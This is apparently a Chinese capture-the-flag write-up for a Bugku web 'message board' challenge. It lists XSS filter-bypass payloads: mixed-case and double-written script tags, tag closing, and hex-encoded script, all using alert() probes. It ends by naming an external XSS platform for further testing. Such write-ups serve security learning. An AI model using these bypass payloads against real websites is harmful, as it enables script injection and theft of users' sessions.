bugku-web-留言板1

大小写绕过也不行

<ScRipt>ALeRt("XSS");</sCRipT>

双写绕过可以

<scscriptript>alert('z')</scscriptript>

改变大小写

在测试过程中，我们可以改变测试语句的大小写来绕过XSS规则：

比如：<script>alert("xss");</script>可以转换为：

<ScRipt>ALeRt("XSS");</sCRipT>

关闭标签

有时候我们需要关闭标签来使我们的XSS生效。

比如："><script>alert("Hi");</script>

使用hex编码绕过

我们可以对我们的语句进行hex编码来绕过XSS规则

比如：<script>alert("xss");</script>可以转换为：

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e

所以确定了过滤方式之后，找个xss平台（https://xssaq.com）测试一下：